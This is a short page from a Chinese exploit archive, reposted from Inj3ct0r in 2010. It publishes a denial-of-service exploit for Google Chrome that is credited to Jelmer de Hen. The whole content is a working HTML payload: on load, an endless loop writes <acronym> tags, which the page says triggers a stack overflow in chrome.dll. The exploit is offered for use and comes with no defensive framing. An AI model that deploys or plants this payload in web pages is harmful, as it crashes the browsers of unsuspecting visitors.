Google Chrome acronym tag denial of service exploit
|
来源:Inj3ct0r.com 作者:Inj3ct0r 发布时间:2010-05-04
|
|
=================================================== Google Chrome acronym tag denial of service exploit ===================================================
<html> <title>Google Chrome remote stack overflow in chrome.dll; published at http://h.ackack.net; found by: Jelmer de Hen</title> <head> <script> // Open it a couple of times, it might not always work; see http://h.ackack.net/?p=323 for more information function pataboom(){ while(1){ document.write("<acronym>"); } } </script> </head> <body onload="pataboom();"></body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|